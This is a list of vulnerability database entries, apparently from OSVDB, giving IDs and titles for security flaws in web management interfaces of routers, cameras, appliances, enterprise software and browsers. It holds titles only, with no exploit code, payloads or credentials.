[93409] Cisco Secure Access Control Server (ACS) Web Interface Session Fixation
[93280] 3com OfficeConnect VPN Firewall Web Interface Default Password
[93278] Barracuda CudaTel Communication Server Web Interface Default Admin Credentials
[93276] MultiTech RouteFinder RF850 / RF860 Internet Security Appliance Web Interface Default Admin Credentials
[93275] SonicWall TZ Series Firewall Web Interface Default Admin Credentials
[93191] AIRAYA WirelessGRID Outdoor Bridge Web Interface Default Admin Credentials
[92989] EMC Avamar Server Web Based File Restore Interface Crafted URL Handling Arbitrary File Access
[92822] HP Proactive Remote Service (PRS) Compaq Remote Service Module (CRSM) Web Interface Privileged File Access
[92785] BT Home Hub Web Management Interface 'Accessible Access Points Table' Page SSID Handling XSS Weakness
[92766] Cisco Unified Computing System Manager Web Interface Technical Support / Local Backup File Information Disclosure
[92555] NETGEAR WNDR4700 Web Interface BRS_03B_haveBackupFile_fileRestore.html Unrestricted Access Authentication Bypass
[92529] Novell GroupWise WebAccess Interface onError Attribute XSS
[92508] Sitecom WLM-3500 Web Interface /romfile.cfg Admin Password Cleartext Remote Disclosure
[92507] Sitecom WLM-3500 Web Interface Multiple Hardcoded Default Passwords
[92313] Schneider Electric Spectra Cameras Malformed Authentication String Web Interface / SOAP Service Remote DoS
[92116] AirDroid Application for Android Web Interface Managed Phone Crafted Text Message XSS
[91457] Polycom HDX Web Interface Firmware Update puputils.ppc PUP File Upload Handling Remote Command Execution
[91327] Citrix Web Interface Authentication Failure Message XSS
[91050] GroundWork Monitor Enterprise Foundation Admin Interface /foundation-webapp/admin/manage-properties.jsp XSS
[91049] GroundWork Monitor Enterprise Foundation Admin Interface /foundation-webapp/admin/manage-performanceDataLabel.jsp XSS
[91048] GroundWork Monitor Enterprise Foundation Admin Interface /foundation-webapp/admin/manage-hostgroups.jsp XSS
[90952] IBM Tivoli Application Dependency Discovery Manager (TADDM) Data Management Portal Web User Interface Unspecified XSS
[90821] Foscam IP Cameras Web Interface Traversal Arbitrary File Access
[90616] IBM System Storage TS3500 Tape Library Web Interface Admin Authentication Bypass
[89819] QTech QFC-P8S2xxH2 Web Interface Default Admin Credentials
[89818] Dataprobe iBoot-G2 Power Switch Web Interface Default Admin Credentials
[89816] Dataprobe iBootBar Web Interface Default Admin Credentials
[89633] IBM InfoSphere Information Server Multiple Web Interface Unspecified XSS
[89375] RuggedCom Rugged Operating System (ROS) Web-based Management Interface Invalid URL Device Reboot DoS
[89357] Edge-CorE WA2121 Mini AP Router Web Interface Default Admin Credentials
[89355] Accton WA5001 Wireless Router Web Interface Default Admin Credentials
[89347] SonicWALL Multiple Product Web Interface skipSessionCheck Parameter Authentication Bypass
[89302] Trimble Infrastructure GNSS Series Receivers Web Interface Unspecified XSS
[88413] Huawei E585 Web Management Interface Web Request Parsing NULL Pointer Dereference Remote DoS
[88412] Huawei E585 Web Management Interface Session Validation Authentication Bypass
[88411] Huawei E585 Web Management Interface Web Request Parsing Traversal Arbitrary File Access
[87621] IBM WebSphere DataPower XC10 Management Interface Access Restriction Weakness Remote DoS
[86412] Foscam IP Cameras Web Interface Authentication Bypass
[86315] Oracle E-Business Suite Oracle iStore Component Web interface Subcomponent Unspecified Remote Issue (2012-5058)
[86314] Oracle E-Business Suite Oracle iStore Component Web interface Subcomponent Unspecified Remote Issue (2012-3138)
[85662] Webify Multiple Product Admin Interface Arbitrary File Deletion
[85102] Websense Multiple Product TRITON Management Console Investigative Reports Web Interface Unspecified Remote Command Execution
[84977] Conceptronic Multiple Product Web Management Interface Client-side JavaScript Admin Authentication Bypass
[84976] Sitecom MD-253 / MD-254 Web Management Interface JavaScript Admin Authentication Bypass
[84259] SMC SMC8024L2 Web Interface Multiple HTML File Direct Request Admin Authentication Bypass
[84098] Red Hat Certificate System Web Interface Certificate Revocation Request Parsing Certificate Authority (CA) Certificate Revocation
[83737] Cisco TelePresence Immersive Endpoint TelePresence Admin Web Interface Malformed Request Parsing Remote Command Execution
[83729] Cisco TelePresence Recording Server Admin Web Interface Malformed Request Parsing Remote Command Execution
[83495] Novell GroupWise WebAccess Interface User.interface Parameter Traversal Arbitrary File Access
[83117] Huawei HG866 Session Validation Web Interface Admin Password Manipulation
[82963] PacketFence Web Admin Guest Management Interface Unspecified XSS
[82502] Bloxx Web Filtering Admin Interface Multiple Function CSRF
[82399] Bloxx Web Filtering Admin Interface Report Viewing XSS
[81839] TP-LINK 8840T Router WAN Interface Web-based Administration Remote Administrator Authentication Bypass
[81838] NETGEAR ProSafe FVS318N Firewall WAN Interface Web-based Administration Remote Administrator Authentication Bypass
[81804] Websense Multiple Product Report Management Web Interface explorer_wse/detail.exe dTitle Parameter XSS
[81033] Siemens Scalance Firewall Web Configuration Interface Zero Delay Failed Login Brute Force Weakness
[81026] Novell iManager Web Interface jclient Create Attribute Function EnteredAttrName Parameter Parsing Remote Overflow
[80286] Enterasys SecureStack Web Interface Console Multiple Module XSS
[80223] Aruba Remote Access Point Diagnostic Web Interface Form Element Parsing Shell Command Execution
[80222] Citrix XenServer vSwitch Controller Component Management Web Interface Multiple Unspecified Issues
[79505] Cisco Small Business SRP520 / SRP540 Series Web Interface HTTP Request Parsing Remote Command Execution
[79398] Samsung DWCD Web Interface Default Password (Femtocell)
[79310] Citrix XenServer Web Self Service Management Web Interface Multiple Unspecified Remote Issues
[78999] Enigma2 Webinterface file Parameter Traversal Arbitrary File Access
[78782] WAGO I/O System 750 PLC Web Interface Multiple File Information Disclosure
[78401] Oracle WebLogic Server WLS-Console Management Interface Unspecified XSS
[78067] op5 Monitor Web Interface Error Message Credentials Disclosure
[78002] Websense Multiple Product Report Management Web Interface explorer_wse/favorites.exe Cookie Parsing Authentication Bypass
[78000] Websense Multiple Product Report Management Web Interface explorer_wse/favorites.exe favName Parameter XSS
[77589] HomeSeer HS2 Web Interface /ctrl URL Admin Command CSRF
[77588] HomeSeer HS2 Web Interface Log Viewer Page URI XSS
[77587] HomeSeer HS2 Web Interface Traversal Arbitrary File Access
[77573] D-Link ShareCenter DNS-320 Administrative Web Interface Authentication Bypass Remote Shutdown/Restart DoS
[77375] Virtual Vertex Muster Web Interface Traversal Arbitrary File Access
[77154] Juniper Junos J-Web Interface Administrator Log XSS
[77146] Juniper Junos J-Web Interface debug.php Unauthenticated Debug Access
[76838] Cisco Small Business SRP520 / SRP540 Series Services Ready Platform Configuration Utility Web Interface Remote Shell Command Execution
[76585] McAfee Web Gateway Web Interface Unspecified XSS
[76146] SonicWALL Web Admin Interface main.html Multiple Field XSS
[76134] OfficeWatch Call Accounting Web Interface Unspecified Traversal Arbitrary File Access
[75212] LifeSize Room Appliance Web Interface gateway.php LSRoom_Remoting.doCommand Function Remote Command Injection
[75211] LifeSize Room Appliance Web Interface gateway.php LSRoom_Remoting.authenticate Function AMF Data true Status Remote Authentication Bypass
[74222] D-Link DPH 150s IP Phone Web Management Interface Remote DoS
[74221] D-Link DPH 150s IP Phone Web Management Interface LCD Display Message Manipulation
[74220] D-Link DPH 150s IP Phone Web Management Interface Arbitrary Configuration File Upload
[74219] D-Link DPH 150s IP Phone Web Management Interface Admin Credential Disclosure
[73987] Cisco SA 500 Series Web Management Interface Unspecified Command Execution
[73986] Cisco SA 500 Series Web Management Interface Login Form SQL Injection
[73659] Aruba Mobility Controller / AirWave Administration Web Interface SSID XSS
[73638] PORTech MV-372 VoIP GSM Gateway Administrative Web Interface Access Restriction Bypass
[73471] ZyXEL ZyWALL Appliances Management Web Interface isAdmin Privilege Escalation
[73374] Intellicom NetBiter webSCADA WS100/WS200 Web Interface Default Credentials
[73228] H3C ER5100 Router Web Interface userLogin.asp Authentication Bypass
[72760] AnyMacro Mail System Web Interface Unspecified Traversal Arbitrary File Access
[72619] Cisco RVS4000 / WRVS4400N Gigabit Routers Web Management Interface Unauthenticated Private SSL Key Disclosure
[72618] Cisco RVS4000 / WRVS4400N Gigabit Routers Web Management Interface Multiple Test Parameter Arbitrary Command Execution
[72617] Cisco RVS4000 / WRVS4400N Gigabit Routers Web Management Interface Unauthenticated Backup Configuration File Disclosure
[72602] Cisco TelePresence Administrative Web Interface Unspecified Servlet Access Remote DoS
[72600] Cisco TelePresence Administrative Web Interface Crafted Request Arbitrary File Overwrite
[70020] IBM WebSphere Service Registry and Repository (WSRR) EJB Interface API Request Access Control Restriction Bypass
[69792] Avaya Application Enablement Services OAM Web Interface Unspecified Issue
[69676] Citrix Web Interface Unspecified XSS
[69451] Cisco Unified Videoconferencing (UVC) Multiple Products Web Interface Cleartext Cookies Remote Information Disclosure
[69450] Cisco Unified Videoconferencing (UVC) Multiple Products Web Interface Predictable Session ID Weakness
[69065] Pay Roll - Time Sheet and Punch Card Application With Web Interface login.asp EmployeeNumber Parameter SQL Injection
[68292] Synology DiskStation Manager FTP Authentication Module Web Interface Login Password Local Disclosure
[68026] AXIGEN Mail Server Ajax Webmail Interface Unspecified XSS
[66758] UPlusFtp Server Web Interface HTTP Request Handling Unspecified Overflow
[66581] SAP J2EE Web Services Navigator Interface Unspecified XSS
[66512] Pre Web Host Login Interface password Parameter SQL Injection
[66015] ALPHA Ethernet Adapter II Web Admin Interface Unspecified Authentication Bypass
[65707] Apple iOS WebKit on iPhone / iPod IFRAME Content Display Boundary Restriction User Interface Spoofing Weakness
[65569] CUPS Web Interface Form Variable Handling cupsd Process Memory Disclosure
[65555] Apple Mac OS X CUPS Web Interface Settings Manipulation CSRF
[65289] Juniper IVE OS Web Interface homepage.cgi Location Parameter Arbitrary Site Redirect
[65288] Juniper IVE OS Web Interface /dana/nc/ncrun.cgi DSSignInURL Parameter XSS
[64945] Home FTP Server Web Interface Admin Account Creation CSRF
[64943] Cisco Scientific Atlanta WebSTAR DPC2100R2 Web Interface Admin Account Default Password
[64942] Cisco Scientific Atlanta WebSTAR DPC2100R2 Web Interface Unspecified Page Direct Request Authentication Bypass
[64669] Consona tgctlcm.dll SdcWebSecureBase Interface pluginlicense.ini ActiveX DNS Whitelist Weakness Access Restriction Bypass
[64668] Consona tgctlcm.dll SdcWebSecureBase Interface Instantiation / Free ActiveX Execution Restriction Bypass
[64667] Consona tgctlcm.dll SdcWebSecureBase Interface Site-locking Implementation ActiveX Execution Restriction Weakness
[64499] ArubaOS HTTPS WebUI Admin Interface TLS Renegotiation Handshakes MiTM Plaintext Data Injection
[63833] TANDBERG Video Communication Server Web Admin Interface helppage.php page Parameter Traversal Arbitrary File Access
[63617] IBM Web Interface for Content Management (WEBi) Client Workstation Cookie Persistence Weakness Unspecified Issue
[63163] Glastopf Webinterface Unspecified Session Fixation
[63135] Glastopf Webinterface Multiple Unspecified SQL Injection
[63134] Glastopf Webinterface Multiple Unspecified XSS
[62964] 3Com Wireless 8760 Dual Radio Web Interface Authentication Bypass
[62890] chumby Web Interface Shell Metacharacter Remote Command Execution
[62835] Perforce P4Web Client Web Interface Unspecified Authentication Bypass
[62364] HP ProCurve Switch Web Management Interface Multiple XSS
[62289] Accellion File Transfer Appliance Web Interface Audit Log username Parameter XSS
[62049] Cisco Unified MeetingPlace Web Server Internal Interface Crafted URL Admin Account Creation
[59854] CUPS Web Interface admin/ kerberos Parameter XSS
[59814] Abyss Web Server Web Management Interface Logging Failure Brute Force Attack Weakness
[59806] NETGEAR RP114 Administrator Web Interface Default Password
[59601] Ericsson HM220dp ADSL Modem Web Interface Admin Authentication Bypass
[59556] Red-M 1050 Web Management Interface Administration Password Handling Remote Overflow
[59549] NETGEAR FM114P Web Configuration Interface port Parameter Traversal Arbitrary File Access
[59139] Everfocus EDR1600 Web Interface Authentication Bypass
[58515] Juniper Junos J-Web Interface Multiple Script m[] Parameter XSS
[58514] Juniper Junos J-Web Interface /script.php Multiple Parameter XSS
[58513] Juniper Junos J-Web Interface /configuration Multiple Parameter XSS
[58512] Juniper Junos J-Web Interface /diagnose Multiple Parameter XSS
[58511] Juniper Junos J-Web Interface Default URI PATH_INFO Parameter XSS
[57698] VMware Studio Web Interface Support Component Traversal Arbitrary File Upload
[56702] Cisco Wireless LAN Controllers (WLC) Admin Web Interface Malformed Request Remote DoS
[56469] Axesstel MV 410R Web Interface Client-side JavaScript Validation Bypass
[56468] Axesstel MV 410R Web Interface Referring Page Redirection CSRF Weakness
[56217] ATEN Multiple Devices HTTPS Web Interface Hardcoded SSL Key Weakness
[55617] NETGEAR DG632 Admin Web Interface html/ Multiple Script Direct Request Authentication Bypass
[55593] Huawei D100 Administrator Web Interface Default Password
[55592] phion airlock Web Application Firewall (WAF) Management Interface Crafted Image Request Arbitrary Command Execution
[55108] D-Link 704p Web Interface syslog.htm Malformed Query Remote DoS
[54690] Samsung G3210 Web Interface Default Password
[54587] OCS Inventory NG Web Interface Error Message User Account Enumeration Weakness
[54461] CUPS Web Interface HTTP Host Header Validation Weakness
[54133] Citrix Web Interface Unspecified XSS
[54118] Rockwell Automation ControlLogix 1756-ENBT/A EtherNet/IP Bridge Module Web Interface Unspecified Information Disclosure
[54117] Rockwell Automation ControlLogix 1756 EtherNet/IP Bridge Module Web Interface Unspecified Open Redirect
[54116] Rockwell Automation ControlLogix 1756-ENBT/A EtherNet/IP Bridge Module Web Interface Unspecified XSS
[54091] AXIGEN Mail Server Web Interface Email Message XSS
[53579] Zeus Crimeware Kit Web Interface Login SQL Injection Authentication Bypass
[53576] SHOUTcast Web Interface User-agent Field XSS
[51847] NETGEAR SSL312 Web Interface cgi-bin/welcome/VPN_only Crafted Request Remote DoS
[51116] F5 BIG-IP Web Management Interface Reconfiguration Facility Arbitrary Perl Code Injection
[50291] Cobbler Web Interface Kickstart Template Manipulation Privilege Escalation
[49941] Apple Safari WebKit plug-in Interface Local URL Arbitrary File Access
[49884] NETGEAR WGR614 Web Interface Character Request Handling Remote DoS
[49466] A-LINK WL54AP3 / WL54AP2 Web Interface CSRF
[49387] Citrix Web Interface Improper Termination Session Hijack
[49357] KTorrent Web Interface Plugin Multiple Variable Arbitrary PHP Code Injection
[49356] KTorrent Web Interface Plugin Crafted POST Request Arbitrary Torrent File Upload
[49212] Sun Integrated Lights-Out Manager Web Interface Unspecified Access Restriction Bypass
[49193] Alice Gate Multiple Routers Web Interface Magic Packet Backdoor Multiple Service Restriction Bypass
[49179] HP SiteScope Web Interface SNMP Trap Messages XSS
[47976] Samsung DVR SHR2040 Web Interface Request Handling DoS
[47925] PageR Enterprise Web Interface URI Traversal Arbitrary File Access
[47879] Dreambox DM500 Web Interface URL Handling Remote DoS
[47673] MailScan for Mail Server Web Admin Interface Crafted Cookie Authentication Bypass
[47672] MailScan for Mail Server Web Admin Interface LOG/ Directory Direct Request Information Disclosure
[47671] MailScan for Mail Server Web Admin Interface URI Traversal Arbitrary File Access
[47670] MailScan for Mail Server Web Admin Interface URI XSS
[47189] EMC Centera Universal Access Web Interface Username SQL Injection
[46705] ServerView Web Interface (SnmpGetMibValues.exe) Crafted URL Handling Overflow
[46604] Avaya SIP Enablement Services (SES) Web Admin Interface Parameter Restoration Privilege Escalation
[46603] Avaya SIP Enablement Services (SES) Web Admin Interface Local Data View Configuration Arbitrary Command Execution
[46602] Avaya SIP Enablement Services (SES) Web Admin Interface Server Configuration Information Disclosure
[46601] Avaya SIP Enablement Services (SES) Web Admin Interface System Utility Information Disclosure
[46600] Avaya SIP Enablement Services (SES) Web Admin Interface Unauthenticated Multiple Folder Arbitrary Default Script Execution
[46599] Avaya SIP Enablement Services (SES) Web Admin Interface Unauthenticated Default Application Execution
[46583] Avaya Communication Manager Web Interface Credential Restoration Unspecified Arbitrary Code Execution
[46582] Avaya Communication Manager Web Interface Data Viewing Configuration Unspecified Arbitrary Code Execution
[46581] Avaya Communication Manager Web Interface System Log Viewing Unspecified Arbitrary Code Execution
[46506] Novell GroupWise WebAccess Simple Interface Unspecified XSS
[46138] XEROX WorkCenter Extensible Interface Platform Web Services Unspecified Security Bypass
[46043] Motion webhttpd.c read_client() Function Motion HTTP Control Interface Remote Overflow
[45877] Aztech DSL600EU Router TCP Sequence Prediction Web Interface Access
[45306] Aruba Mobility Controller Web Interface Multiple Unspecified XSS
[45288] Citrix Access Gateway Web Portal Interface URI Session ID Disclosure
[45068] WHM Interface for cPanel cpanel/whm/webmail CSRF
[45044] ZyXEL ZyWALL Web Management Interface Referer HTTP Header XSS
[44940] Bugzilla WebService XML-RPC Interface canconfirm Check Bypass
[44645] TorrentFlux Downloaded Torrent Remote Web Interface PHP Code Execution
[44156] Citrix NetScaler Web Management Interface Cookie Credentials Encryption Weakness
[44155] Citrix NetScaler Web Management Interface IP Address Cookie Information Disclosure
[44059] Airspan WiMAX ProST Web Management Advanced User Interface Pages Default Credentials
[43884] F5 BIG-IP Web Management Interface sysLocation SNMP Configuration Field XSS
[43883] F5 BIG-IP Web Management Interface sysContact SNMP Configuration Field XSS
[43882] F5 BIG-IP Web Management Interface Node Object Name XSS
[43356] IBM Rational ClearQuest Web Interface Multiple Parameter XSS
[43037] Snom 320 SIP Phone Web Interface Unspecified XSS
[43017] Snom 320 SIP Phone Web Interface CSRF
[43014] Snom 320 SIP Phone Web Interface Call A Number Field Remote System Access
[43011] Belkin Multiple Routers Web Interface Administrative Command Execution Authentication Bypass
[42812] Adobe LiveCycle Workflow Web Management Interface Unspecified XSS
[42162] Lyris ListManager Web Interface Arbitrary Account Creation / Overwrite
[42161] Lyris ListManager Web Interface Arbitrary Mail List Access
[42160] Lyris ListManager Web Interface List Subscriber Privilege Escalation
[41089] Mailman Web Admin Interface List Info XSS
[39937] Oracle Database Ultra Search Administration Web Interface Unspecified Remote Issue
[39271] Citrix Web Interface On-Line Help Unspecified XSS
[38789] Cerberus FTP Server Web Interface Unspecified XSS
[38596] TeamSpeak WebServer TCP Query Interface Arbitrary File Access
[38482] Avaya MSS / MN Administrative Web Interface Unspecified Remote DoS
[37837] Fujitsu-Siemens Computers PRIMERGY BX300 Switch Blade Web Interface Authentication Cancellation Information Disclosure
[37808] Yoggie Pico Web Interface cgi-bin/runDiagnostics.cgi param Variable Shell Command Injection
[37462] Helm Web Hosting Control Panel interfaces/standard/FileManager.asp Multiple Parameter XSS
[37461] Helm Web Hosting Control Panel interfaces/standard/domain.asp showOption Parameter XSS
[37202] Bugzilla WebService (XML-RPC) Interface Time-tracking Permission Weakness Information Disclosure
[36441] WebCart Management Interface Multiple XSS
[36289] Pay Roll - Time Sheet and Punch Card Application With Web Interface login.asp Password Parameter SQL Injection
[32959] Symantec Web Security (SWS) License Registering Interface Large File DoS
[31855] J-OWAMP Web Interface JOWAMP_ShowPage.php link Parameter Remote File Inclusion
[31812] XEROX WorkCentre Products Web User Interface Authentication Bypass
[31805] XEROX WorkCentre Products Web User Interface Microsoft Networking Configuration Command Injection
[31804] XEROX WorkCentre Products Web User Interface Scan-to-mailbox Folder Name Command Injection
[31803] XEROX WorkCentre Products Web User Interface TCP/IP Hostname Command Injection
[29920] AirMagnet Enterprise Web Interface Scanned SSID XSS
[26652] Cisco CallManager Web Interface ccmuser/logon.asp XSS
[26651] Cisco CallManager Web Interface ccmadmin/phonelist.asp pattern Parameter XSS
[22858] APC PowerChute Web Interface Cleartext Authentication Credential Transmission
[21615] Nortel SSL VPN Web Interface tunnelform.yaws a Variable Arbitrary Command Execution
[20873] Webmin Interface File Display Content XSS
[19310] Ingate Firewall/SIParator Admin Web Interface Unspecified XSS
[18470] Linksys Multiple Router Web Management Interface Password Field Overflow
[14867] NotifyLink Enterprise Server Web Interface User Password Disclosure
[14278] Mitel 3300 ICP Web Management Interface Session Exhaustion DoS
[14277] Mitel 3300 ICP Web Management Interface Session Hijacking
[14232] A-V Tronics Inetserv Webmail Interface Username Overflow
[13799] Infinite Interchange Web Interface Large POST Request Handling Remote DoS
[13486] SOHO Routefinder 550 Web Interface Default Admin Account
[12783] Dillo Web Browser a_Interface_msg() Remote Format String
[12716] Soldner Secret Wars Web Interface XSS
[12675] Macallan Mail Solution Web Interface Malformed URL MCPop3 Service DoS
[12674] Macallan Mail Solution Web Interface Malformed URL Authentication Bypass
[11693] Roxen Web Server Admin Interface Unprivileged User Access
[11690] Roxen Web Server Admin Interface Database Password Disclosure
[11685] Roxen Web Server Admin Interface Unprivileged User Database Modification
[10847] Ipswitch IMail Webmail Interface readmail.cgi Mailbox Name DoS
[10845] Ipswitch IMail Web Interface URI Referer Session Token Disclosure
[10844] Ipswitch IMail Webmail Interface printmail.cgi Mailbox Name DoS
[9472] Oracle PL/SQL Gateway Web Admin Interface Null Authentication
[9226] ht://Check PHP Interface Web Page XSS
[8891] Cisco Cache Engine Web Admin Interface Statistics Information Disclosure
[8855] Cisco CSS 11000 Web Interface Malformed XML Data DoS
[8854] Cisco CSS 11000 Web Interface HTTPS POST DoS
[7751] Air Messenger LAN Server Webpaging Interface Arbitrary File Access
[6849] Billion BIPAC-640 AE Administrative Web Interface User
[6676] Request Tracker Web Interface XSS
[6577] Cisco Linksys Routers Administrative Web Interface Access
[6159] Trend Micro InterScan VirusWall Web Interface Direct Request Remote Configuration Manipulation
[6039] eMule Web Interface POST Content Length DoS
[5774] CommuniGate Pro Web Interface Arbitrary File Retrieval
[5597] Cisco Aironet Web Interface Arbitrary Modification
[3926] Macallan Mail Solution Web Interface Authentication Bypass
[3788] NetWin SurgeFTP Web Interface URL Decoding DoS
[3329] nd WebDAV Interface String Handling Multiple Overflows
[3312] Webcam Watchdog Web Interface HTTP GET Request Handling Overflow
[1383] Computalynx CMail Web Interface CPU Consumption DoS
[1382] Computalynx CMail Web Interface Buffer Overflow
[685] Cisco PIX Firewall Manager (PFM) on Windows Web Interface Traversal Arbitrary File Access
[444] Cisco Catalyst Web Interface /exec Remote Command Execution
[318] Sambar Server Sysadmin Web Interface Default Account
[96154] National Instruments LabVIEW Application Web Server Permission Management Local Privilege Escalation
[96149] Google Chrome WebVTTParser::createDocumentFragmentFromCueText Function Empty Text Handling DoS
[96137] IBM Multiple Product Intelligent Platform Management Interface (IPMI) User Account Default Password
[96136] IBM Multiple Product Intelligent Platform Management Interface (IPMI) RAKP Protocol Support Password Hash Remote Disclosure
[96135] IBM Multiple Product Intelligent Platform Management Interface (IPMI) Plaintext Password Local Disclosure
[96118] Google Web Toolkit (GWT) loadSelectionScript Method moduleName XSS
[96070] Atlassian JIRA /src/main/webapp/secure/admin/user/views/deleteuserconfirm.jsp name Parameter XSS
[96061] Monster Menus Module for Drupal mm_webform submodule Unauthorized Webform Submission Deletion
[96057] RESTful Web Services Module for Drupal Write Operation Access Restriction Bypass
[96042] WebKit FormAssociatedElement::formAttributeChanged Function Out-of-tree FormAttributeTargetObserver Creation DoS
[96040] WebKit CSSParser::parseValue Function String Text-align Support DoS
[96039] ownCloud user_webdavauth Unspecified Authentication Bypass
[96038] ownCloud Share Interface Unspecified XSS
[96030] Trustport Webfilter help.php hf Parameter Traversal Arbitrary File Access
[96029] Cisco TelePresence Web Server Password Recovery Administrator Account Default Credentials
[96023] Mozilla Multiple Product Web Workers XMLHttpRequest Call Handling Same Origin Policy Bypass XSS Weakness
[95883] Siemens Scalance W7xx Multiple Product Command-Line Based Management Interface Unspecified Remote Code Execution
[95880] Cisco WebEx Meetings Server Account Deactivation Bypass
[95879] Cisco Video Surveillance VC220 Network Dome Camera / VC240 Network Bullet Camera Web UI Crafted Packet Handling Remote DoS
[95877] Cisco Wide Area Application Services (WAAS) Web Service Framework Crafted Request Handling Remote Code Execution
[95876] Cisco WebEx Crafted SPI Call Handling Arbitrary File Enumeration
[95865] General Electric (GE) Proficy HMI/SCADA - CIMPLICITY CimWebServer.exe Password Decoding Crafted Request szPassword Field Handling Stack Buffer Overflow
[95864] General Electric (GE) Proficy HMI/SCADA - CIMPLICITY CimWebServer.exe Broadcase/Init Crafted Request szOptions Field Handling Stack Buffer Overflow
[95819] Cogent DataHub Web Server Component Crafted HTTP Header Handling Stack Buffer Overflow
[95800] WebDisk for iOS afgetdir.ma p Parameter Remote Command Execution
[95786] IBM WebSphere Commerce Cross-user Web Service Request Execution
[95785] IBM Websphere Commerce REST Services Session Termination Weakness
[95770] IBM WebSphere Application Server (WAS) Security Domain Level addHttpOnlyAttributeToCookies Setting Weakness
[95769] IBM WebSphere Application Server (WAS) Security Configuration Incorrect Registry Property Weakness
[95768] IBM WebSphere Application Server (WAS) Non-Default Custom umask Setting Incorrect File Permission Weakness
[95767] IBM WebSphere Application Server (WAS) Secure / HttpOnly Flag Cookie Weakness
[95766] IBM WebSphere Application Server (WAS) Properties File Base Configuration (PFBC) Local Cleartext Password Disclosure
[95765] IBM WebSphere Application Server (WAS) startServer Process Configuration Manager Incorrect File Permission Weakness
[95764] IBM WebSphere Application Server (WAS) Incorrect Password Authentication Attempt Logging Weakness
[95703] Symantec Web Gateway /spywall/nameConfig.php Remote Command Execution
[95702] Symantec Web Gateway Radius Authentication Unspecified Remote Command Execution
[95700] Symantec Web Gateway /spywall/networkConfig.php Remote Command Execution
[95699] Symantec Web Gateway LDAP Server Configuration Manipulation CSRF
[95698] Symantec Web Gateway /spywall/edit_alert.php alertid Parameter SQL Injection
[95696] Symantec Web Gateway /spywall/feedback_report.php variable Parameter SQL Injection
[95695] Symantec Web Gateway /etc/sudoers Insecure Command Handling Local Privilege Escalation
[95692] Symantec Web Gateway /spywall/blocked.php u Parameter XSS
[95690] Symantec Web Gateway /spywall/feedback_report.php onfocus Parameter XSS
[95669] Cisco WebEx Remote Support Center Action Handling Prompt Bypass
[95662] Squid SNMP Interface Crafted Packets Handling Memory Leak Remote DoS
[95660] Cisco Adaptive Security Appliances (ASA) WebVPN Portal Login Page Unspecified XSS
[95621] IBM Cognos Command Center Web Client Web\Content\Help\ Multiple Unspecified XSS
[95603] Apache Continuum web/util/GenerateRecipentNotifier.java recipient Parameter XSS
[95602] Apache Continuum web/action/notifier/JabberProjectNotifierEditAction-jabberProjectNotifierSave-validation.xml Multiple Parameter XSS
[95601] Apache Continuum web/action/notifier/JabberGroupNotifierEditAction-jabberProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
[95600] Apache Continuum web/action/ScheduleAction-saveSchedule-validation.xml Multiple Parameter XSS
[95599] Apache Continuum web/action/BuildDefinitionAction-saveBuildDefinition-validation.xml Multiple Parameter XSS
[95598] Apache Continuum web/action/AddProjectAction-addProject-validation.xml Multiple Parameter XSS
[95597] Apache Continuum web/action/ProjectEditAction-projectSave-validation.xml Multiple Parameter XSS
[95596] Apache Continuum web/action/notifier/IrcGroupNotifierEditAction-ircProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
[95595] Apache Continuum web/action/notifier/IrcProjectNotifierEditAction-ircProjectNotifierSave-validation.xml Multiple Parameter XSS
[95594] Apache Continuum web/action/ProjectGroupAction.java Multiple Parameter XSS
[95593] Apache Continuum web/action/AddProjectGroupAction.java Multiple Parameter XSS
[95592] Apache Continuum web/action/AddProjectAction.java Multiple Parameter XSS
[95590] WebKit Speech Input From Script Access Arbitrary Code Execution
[95581] Symantec Encryption Management Server Web Email Protection Component Encrypted Email Attachment XSS
[95550] Tomcat for JBoss Enterprise Web Server / RHEL Red Hat Package Manager (RPM) Distributions Multiple Init Script Symlink Local Privilege Escalation
[95523] Apache OFBiz Webtools Application View Log Screen Unspecified XSS
[95496] Dustweb Image Manager for TinyMCE newfolder Action name Parameter XSS
[95495] Dustweb Image Manager for TinyMCE newfolder Action Arbitrary File Upload
[95492] IBM Social Media Analytics User Interface Unspecified XSS
[95379] Cisco WebEx One-Click Client Password Encryption Weakness
[95342] Sun Java Web Console masthead.jsp mastheadUrl / pageTitle Parameters XSS
[95320] Oracle Secure Global Desktop Web UI Subcomponent Unspecified Remote Issue (2013-3782)
[95319] Oracle Secure Global Desktop Web UI Subcomponent Unspecified Remote Issue (2013-3779)
[95287] Oracle Agile PLM Framework Web Client (CS) Subcomponent Unspecified Remote Issue
[95279] Oracle Enterprise Manager Grid Control Enterprise Manager Base Platform Component User Interface Framework Subcomponent Unspecified Remote Issue
[95274] Oracle WebCenter Content Web Forms Subcomponent Unspecified Remote Issue
[95273] Oracle WebCenter Content Site Studio Subcomponent Unspecified Remote Issue
[95271] Oracle WebCenter Content Content Server Subcomponent Unspecified Remote Issue
[95175] OpenEMR /interface/main/onotes/office_comments_full.php note Parameter XSS
[95174] OpenEMR /interface/reports/custom_report_range.php end Parameter SQL Injection
[95133] WebKit AccessibilityRenderObject::computeAccessibilityIsIgnored Function Bad Cast Unspecified Issue
[95119] ANGLE libGLESv2/renderer/IndexBuffer.cpp StreamingIndexBufferInterface::reserveBufferSpace Function Write Position Integer Overflow
[95106] Cisco Unified MeetingPlace Web Conferencing Unspecified XSS
[95104] Google Chrome Non-web-accessible Extension URL Loading Weakness
[95100] Google Chrome -webkit-mask Property Serialization Arbitrary Code Execution
[95082] Google Chrome WebPageSerializerImpl::endTagToString Function Bad Cast Unspecified Issue
[95064] Cisco TelePresence TC Software Web Portal Initial Password Configuration Authentication Bypass
[95057] Intelligent Platform Management Interface (IPMI) RMCP+ Authenticated Key-Exchange Protocol (RAKP) Authentication Remote HMAC Disclosure
[95049] CAREL pCOWeb Multiple Default Passwordless Accounts
[94992] Adobe ColdFusion WebSockets ColdFusion Components (CFC) Public Method Invocation
[94952] dl (Download Ticket Service) Admin Interface Unspecified CSRF
[94951] dl (Download Ticket Service) REST Interface CSRF
[94884] cPanel Web Host Manager (WHM) locale Function Privilege Escalation
[94861] Parallels Plesk Website Copy Feature Hardlink Arbitrary File Access
[94819] WebKit RadioInputType::handleKeydownEvent Function Use-after-free Arbitrary Code Execution
[94818] WebKit AudioBuffer ArrayBuffer Neutering Use-after-free Arbitrary Code Execution
[94816] WebKit dom/Element.cpp Element::setAttributeNode Function Use-after-free Arbitrary Code Execution
[94815] WebKit AccessibilityRenderObject::accessibilityImageMapHitTest Function Area Element Parent Handling Bad Cast Issue
